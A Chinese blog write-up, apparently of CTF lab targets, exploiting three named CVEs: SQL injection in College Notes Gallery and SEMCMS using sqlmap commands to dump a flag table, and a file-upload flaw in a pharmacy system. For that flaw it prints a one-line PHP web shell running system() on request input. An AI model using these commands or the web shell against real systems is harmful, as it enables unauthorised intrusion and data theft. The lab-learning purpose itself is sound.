shaushaushau1

CVE-2023-7130

靶标介绍:

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.

已经告诉你在哪里存在sql注入了,一般上来应该先目录扫描再进行判断,看是否存在sql注入,这里就直接进行注入

抓包

保存到5.txt中

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D notes --tables

sqlmap -r 5.txt -batch -D notes -T flllaaaag --columns

sqlmap -r 5.txt -batch -D notes -T flllaaaag -C flag --dump

CVE-2023-48864

靶标介绍:

SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在安全漏洞,该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。

存在sql注入

进行目录扫描

dirsearch -u http://    -e*

一一访问后,来到install/安装导向

127.0.0.1

semcms

root

root

安装后会来到日志页面

日志里面有后台地址,登录账号和密码

登录

在产品管理页面随便勾选,选择批量上架,抓包,保存为5.txt

经过测试后发现参数languageID并不是注入点,后面的AID才是注入的点

存在时间盲注,注入点是参数AID

有这四个数据库,爆semcms数据库,得表

可以看到flllaaaag表

得到

CVE-2022-30887

靶标介绍:

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

 目录扫描后什么都没有

判断应该是需要登录进去,但是邮箱不容易爆破,发现最底下Mayurik可以点击,访问

当在最下面点击那些下载按钮后会访问,接着会弹出一个邮箱

mayuri.infospace@gmail.com

密码尝试mayurik,成功登录进去

找到上传界面,上传一句话木马

上传成功

 访问该网页后返回config.php页面

说明上传成功,且可以执行

连接蚁剑

连接后全是木马文件,还是不死马,点击一下就复制一份

正常情况下是可以直接访问flag的

尝试官方的POC

POC

上传的木马内容

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?> 

上传成功

进行get传参

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值